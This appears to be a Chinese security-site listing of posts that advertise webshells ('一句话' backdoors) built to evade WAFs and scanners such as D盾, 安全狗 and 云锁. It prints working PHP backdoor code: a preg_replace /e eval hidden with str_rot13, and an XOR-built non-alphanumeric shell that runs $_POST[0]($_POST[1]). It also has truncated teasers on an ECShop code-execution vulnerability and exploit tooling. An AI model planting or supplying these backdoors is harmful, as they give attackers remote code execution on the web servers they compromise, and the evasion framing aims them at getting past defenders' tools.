最新免杀一句话

<?php ($sun = $_POST['pass']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($sun)', 'add');?>好吧 应网友需求,刚去做了个过d盾的,其他的没测试<?php$a = chr(92+5);$b&n

能秒99%的waf防火墙

开始详情看这:https://www.leavesongs.com/PHP/bypass-eval-length-restrict.html原谅我见识短,没用过usort函数上面连接的文章中,发现有这个函数于是刚刚了解了下usort函数 usort函数干嘛的?官方介绍:http://php.net/manual/zh/function.usort.php通俗点说就是一个稍微复杂点的数组,如果用php自带的函数不是很方便所以用户可以自己定义一个函数,然后使用usort函数来进行回调123

过狗过盾的php一句话(非字母数字的)

代码比较简单,利用php异或(^)非字母数字生成后门,
详细的有关php异或的解释,参考:编写变态的(非字母数字的)PHP后门
文中提到的这种:
<?php
    @$_++; // $_ = 1
    $__=("#"^"|"); // $__ = _
    $__.=("."^"~"); // _P
    $__.=("/"^"`"); // _PO
    $__.=("|"^"/"); // _POS
    $__.=("{"^"/"); // _POST 
    ${$__}[!$_](${$__}[$_]); // $_POST[0]($_POST[1]);
?>

php-cgi解析漏洞 绕过云锁拦截

云锁拦截.jpg

asp过狗过最新版本D盾一句话(无意中得到的)

ECShop 2.x 3.0代码执行漏洞分析

0×00 前言ECShop是一款B2C独立网店系统,适合企业及个人快速构建个性化网上商店。2.x版本跟3.0版本存在代码执行漏洞。0×01 漏洞原理ECShop 没有对 $GLOBAL[‘_SERVER’][‘HTTP_REFERER’] 变量进行验证,导致用户可以将任意代码插入的user_passport.dwt模板中,随后insert_mod根据模板内容动态执行相应的函数,用户插入恶意代码导致模板动态执行了lib_insert下的 insert_ads 方法,通过SQL注入,返回构造的执行代

.net下asmx一句话服务端两个

接力昨天的ashx一句话http://www.5kik.com/aspnews/646.html,今天放出的是基于webservice实现的一句话,另外还有asmx的小马 一并打包。<%@ WebService Language="JScript" class="ScriptMethodSpy"%>import System;import System.Web;import Syste

CMS漏洞检测和利用套件

CMSeeK是一个CMS的漏洞检测和利用套件。已发布版本- Version 1.0.1 [19-06-2018] - Version 1.0.0 [15-06-2018]Changelog文件特性支持20多种CMS的基本CMS检测高级Wordpress扫描版本检测用户检测(3种检测方法)查找版本漏洞等!模块化爆破系统 你可以根据需求选择自带爆破模块或自己创建模块并与之集成安装要求及兼容性:CMSeeK是由python

PHP使用流包装器实现WebShell

0×00 前言在Web安全领域WebShell的构造与查杀是永不停息的话题,这几天发现了一种新型方式生成WebShell,隐蔽度高,目前安全查杀软件没法检测到相关的后门漏洞,不同于 eval 或则 asset 等方式运行后门,对于这两个函数禁用的情况下一样适用,目前除了禁用相关函数还暂时没有相关方式来避免漏洞。0×01 后门原理在PHP开发中,我们使用最为频繁的指令大概就是 include 指令, include 指令中一些比较普通的文件包含漏洞我们就忽略了,先来看看一串代码:include&n

不包含数字字母的WebShell

2.png